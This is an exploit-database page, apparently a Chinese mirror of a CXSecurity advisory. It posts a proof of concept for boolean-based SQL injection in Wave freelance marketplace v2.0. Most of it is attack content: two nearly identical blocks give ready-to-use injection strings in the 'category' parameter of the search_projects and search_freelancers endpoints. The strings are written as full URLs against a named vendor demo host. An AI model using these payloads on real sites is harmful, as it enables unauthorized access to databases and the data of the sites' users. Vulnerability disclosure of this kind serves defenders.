Wave - Powerful Freelance Marketplace System SQL Inj. - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1878805 漏洞类型
发布时间 2019-12-30 更新时间 2019-12-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120120
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================================================
# Exploit Title: Wave - Powerful Freelance Marketplace System SQL Inj.
# Dork: N/A
# Date: 29-12-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Software Link: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Build a great and successful Freelance Marketplace Business with this System.
===========================================================================================
# POC - SQLi (Boolean Based)
# Parameters : category
# Attack Pattern : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999%27) oR 6841947=6841947 aNd (%276199%27)=(%276199 
# POST Method : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Wave - Powerful Freelance Marketplace System SQL Inj.
# Dork: N/A
# Date: 29-12-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Software Link: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Build a great and successful Freelance Marketplace Business with this System.
===========================================================================================
# POC - SQLi (Boolean Based)
# Parameters : category
# Attack Pattern : https://www.themashabrand.com/scripts/Wave/search_freelancers^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=%27 oR 7183593=7183593 aNd %27%25%27=%27
# POST Method : https://www.themashabrand.com/scripts/Wave/search_freelancers^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=
===========================================================================================